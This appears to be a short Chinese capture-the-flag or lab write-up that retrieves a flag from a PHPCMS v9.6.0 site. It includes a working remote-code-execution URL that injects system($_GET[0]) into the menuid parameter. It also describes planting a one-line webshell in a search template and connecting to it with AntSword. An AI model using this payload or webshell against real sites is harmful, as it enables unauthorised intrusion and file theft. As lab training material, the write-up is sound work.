CMS系统漏洞分析溯源(第2题)

从题目得知是PHPCMS搭建的网站,从这里可以在网上搜到PHPCMS的漏洞以下为该漏洞的介绍帖

PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户

步骤:

方法一:

首先用yakit扫描找到后台,发现可以直接登录

登陆后直接利用漏洞查看文件列表

复制代码
/index.php?0=ls&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

得到key的名称后直接把ls改为cat key_xxxxxxx.php,再按f12或者CTRL+U查看网页源代码,得到key

方法二:

也是用yakit扫描出的后台进行登录,然后点击界面→模块风格→defaul详细列表→search→index.html 在结尾或者开头插入一句话木马,尽量不要破坏整个html

再使用蚁剑连接连接地址http://ip:port/index.php?m=search,这里解码器需要选择chr

相关推荐
云安全助手3 小时前
弹性云服务器+高防IP:让DDoS攻击不再是业务“生死劫”
运维·网络·安全
kang0x05 小时前
easyRSA - Writeup by AI
安全
星幻元宇VR7 小时前
VR单人地震体验平台,学习科学避险
科技·学习·安全·vr·虚拟现实
Chuer_9 小时前
讲透财务Agent核心概念,深度拆解财务Agent应用趋势
大数据·数据库·安全·数据分析·甘特图
IT菜鸟程9 小时前
网络安全实战nginx漏洞版本升级 1.28.0到1.30.0
安全·web安全
JS_SWKJ9 小时前
多网闸级联部署避坑指南:安全与性能如何兼得?
网络·安全
YaBingSec10 小时前
玄机靶场:供应链安全-供应链应急-Part2 通关笔记
java·笔记·安全
黎阳之光10 小时前
黎阳之光:以视频孪生+全域感知,助力低空经济破局突围
大数据·人工智能·算法·安全·数字孪生
Promise微笑11 小时前
开关柜局放测试仪选型避坑指南:如何从技术维度保障电力资产安全?
人工智能·安全
g3voip11 小时前
SIP 对讲广播系统优质厂家与品牌推荐
tcp/ip·安全·信息与通信·调度